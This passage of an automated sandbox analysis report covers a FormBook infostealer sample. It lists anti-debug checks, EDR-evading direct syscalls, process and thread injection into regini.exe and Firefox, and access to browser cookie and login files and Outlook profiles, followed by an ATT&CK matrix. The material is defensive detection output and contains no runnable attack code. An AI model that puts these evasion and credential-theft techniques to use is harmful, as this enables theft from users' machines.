                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01586A50 mov eax, dword ptr fs:[00000030h]5_2_01586A50
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01586A50 mov eax, dword ptr fs:[00000030h]5_2_01586A50
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01586A50 mov eax, dword ptr fs:[00000030h]5_2_01586A50
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FCA72 mov eax, dword ptr fs:[00000030h]5_2_015FCA72
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FCA72 mov eax, dword ptr fs:[00000030h]5_2_015FCA72
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BCA6F mov eax, dword ptr fs:[00000030h]5_2_015BCA6F
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BCA6F mov eax, dword ptr fs:[00000030h]5_2_015BCA6F
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BCA6F mov eax, dword ptr fs:[00000030h]5_2_015BCA6F
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BCA38 mov eax, dword ptr fs:[00000030h]5_2_015BCA38
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A4A35 mov eax, dword ptr fs:[00000030h]5_2_015A4A35
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A4A35 mov eax, dword ptr fs:[00000030h]5_2_015A4A35
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160CA11 mov eax, dword ptr fs:[00000030h]5_2_0160CA11
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AEA2E mov eax, dword ptr fs:[00000030h]5_2_015AEA2E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BCA24 mov eax, dword ptr fs:[00000030h]5_2_015BCA24
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01580AD0 mov eax, dword ptr fs:[00000030h]5_2_01580AD0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B4AD0 mov eax, dword ptr fs:[00000030h]5_2_015B4AD0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B4AD0 mov eax, dword ptr fs:[00000030h]5_2_015B4AD0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015D6ACC mov eax, dword ptr fs:[00000030h]5_2_015D6ACC
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015D6ACC mov eax, dword ptr fs:[00000030h]5_2_015D6ACC
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015D6ACC mov eax, dword ptr fs:[00000030h]5_2_015D6ACC
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BAAEE mov eax, dword ptr fs:[00000030h]5_2_015BAAEE
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BAAEE mov eax, dword ptr fs:[00000030h]5_2_015BAAEE
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B8A90 mov edx, dword ptr fs:[00000030h]5_2_015B8A90
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158EA80 mov eax, dword ptr fs:[00000030h]5_2_0158EA80
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158EA80 mov eax, dword ptr fs:[00000030h]5_2_0158EA80
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158EA80 mov eax, dword ptr fs:[00000030h]5_2_0158EA80
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158EA80 mov eax, dword ptr fs:[00000030h]5_2_0158EA80
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158EA80 mov eax, dword ptr fs:[00000030h]5_2_0158EA80
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158EA80 mov eax, dword ptr fs:[00000030h]5_2_0158EA80
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158EA80 mov eax, dword ptr fs:[00000030h]5_2_0158EA80
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158EA80 mov eax, dword ptr fs:[00000030h]5_2_0158EA80
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158EA80 mov eax, dword ptr fs:[00000030h]5_2_0158EA80
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01654A80 mov eax, dword ptr fs:[00000030h]5_2_01654A80
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01588AA0 mov eax, dword ptr fs:[00000030h]5_2_01588AA0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01588AA0 mov eax, dword ptr fs:[00000030h]5_2_01588AA0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015D6AA4 mov eax, dword ptr fs:[00000030h]5_2_015D6AA4
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01580D59 mov eax, dword ptr fs:[00000030h]5_2_01580D59
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01580D59 mov eax, dword ptr fs:[00000030h]5_2_01580D59
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01580D59 mov eax, dword ptr fs:[00000030h]5_2_01580D59
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01588D59 mov eax, dword ptr fs:[00000030h]5_2_01588D59
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01588D59 mov eax, dword ptr fs:[00000030h]5_2_01588D59
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01588D59 mov eax, dword ptr fs:[00000030h]5_2_01588D59
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtClose: Direct from: 0x76EE7B2E
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeMemory written: C:\Users\user\Desktop\BcF3o0Egke.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: NULL target: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: NULL target: C:\Windows\SysWOW64\regini.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\regini.exeThread register set: target process: 5564Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\regini.exeThread APC queued: target process: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess created: C:\Users\user\Desktop\BcF3o0Egke.exe "C:\Users\user\Desktop\BcF3o0Egke.exe"Jump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess created: C:\Users\user\Desktop\BcF3o0Egke.exe "C:\Users\user\Desktop\BcF3o0Egke.exe"Jump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: ysdBLufRFxAq.exe, 00000006.00000002.3935537287.00000000019B1000.00000002.00000001.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000006.00000000.2366311176.00000000019B1000.00000002.00000001.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000009.00000000.2523244598.0000000000F21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: ysdBLufRFxAq.exe, 00000006.00000002.3935537287.00000000019B1000.00000002.00000001.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000006.00000000.2366311176.00000000019B1000.00000002.00000001.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000009.00000000.2523244598.0000000000F21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: ysdBLufRFxAq.exe, 00000006.00000002.3935537287.00000000019B1000.00000002.00000001.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000006.00000000.2366311176.00000000019B1000.00000002.00000001.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000009.00000000.2523244598.0000000000F21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: ysdBLufRFxAq.exe, 00000006.00000002.3935537287.00000000019B1000.00000002.00000001.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000006.00000000.2366311176.00000000019B1000.00000002.00000001.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000009.00000000.2523244598.0000000000F21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeQueries volume information: C:\Users\user\Desktop\BcF3o0Egke.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.BcF3o0Egke.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.BcF3o0Egke.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3937654032.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3935912832.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3935958759.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2475970970.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3935959813.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2443326901.0000000001970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\regini.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.BcF3o0Egke.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.BcF3o0Egke.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3937654032.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3935912832.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3935958759.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2475970970.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3935959813.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2443326901.0000000001970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS2
                File and Directory Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets113
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588352 Sample: BcF3o0Egke.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 33 www.windsky.click 2->33 35 www.whisperart.net 2->35 37 13 other IPs or domains 2->37 45 Suricata IDS alerts for network traffic 2->45 47 Antivirus detection for URL or domain 2->47 49 Antivirus / Scanner detection for submitted sample 2->49 51 5 other signatures 2->51 10 BcF3o0Egke.exe 3 2->10         started        signatures3 process4 file5 31 C:\Users\user\AppData\...\BcF3o0Egke.exe.log, ASCII 10->31 dropped 65 Injects a PE file into a foreign processes 10->65 14 BcF3o0Egke.exe 10->14         started        17 BcF3o0Egke.exe 10->17         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 19 ysdBLufRFxAq.exe 14->19 injected process9 signatures10 53 Found direct / indirect Syscall (likely to bypass EDR) 19->53 22 regini.exe 13 19->22         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 22->55 57 Tries to harvest and steal browser information (history, passwords, etc) 22->57 59 Modifies the context of a thread in another process (thread injection) 22->59 61 3 other signatures 22->61 25 ysdBLufRFxAq.exe 22->25 injected 